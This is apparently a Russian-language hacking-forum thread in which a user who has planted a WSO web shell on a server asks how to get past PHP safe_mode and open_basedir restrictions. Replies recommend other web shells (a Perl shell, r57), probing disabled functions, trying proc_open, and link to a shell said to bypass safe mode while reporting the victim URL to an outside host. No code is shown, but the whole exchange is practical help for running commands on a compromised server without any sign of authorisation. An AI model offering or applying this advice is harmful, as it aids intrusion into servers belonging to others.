Обход Safe mod+Open basedir
 

Привет ачатовцы!
Проблема такая залил шелл (WSO), но на серваке safe_mod=on, open_basedir=on. То есть никакие команды я выполнить не могу, и листинг диры где я тоже не могу сделать.
Я поискал, но ничего толкового не нашел.
Может кто знает как обойти эти 2 опции?

Если эта тема чем то не подходит по правилам, модеры хоть отпишите в личку за что?

Есть возможность, зависит от версии PHP.
Но для начала попробуй PERL - шелл како-нибудь, может помочь. + в r57 от Elekt'a есть возможносьб обхода safe_mode и basedir

Экстрасенсы в отпуске. Версию пыха, ось и список запрешенных команд.

PHP 5.2.6.
CentOS
Linux 2.6.18-128.1.10
А с перловым и r57 я попробую, спасибо.

Команды все, какую не введу ни одна не проходит...

Список отключенных команд можно взять из phpinfo.
Если proc_open там не виднеется, то попробуй - https://forum.antichat.ru/thread114500.html

http://forum.antichat.ru/showthread.php?t=37928

Попробуй этот шел.
http://stashbox.org/823273/4e.txt
У меня обход safe mod'a сработал.
Только имей ввиду, что он отсылает данные на http://fx0.name/spec/index.php/pic.png?a=http://host/your_shell.php
Так что используй на свой страх и риск.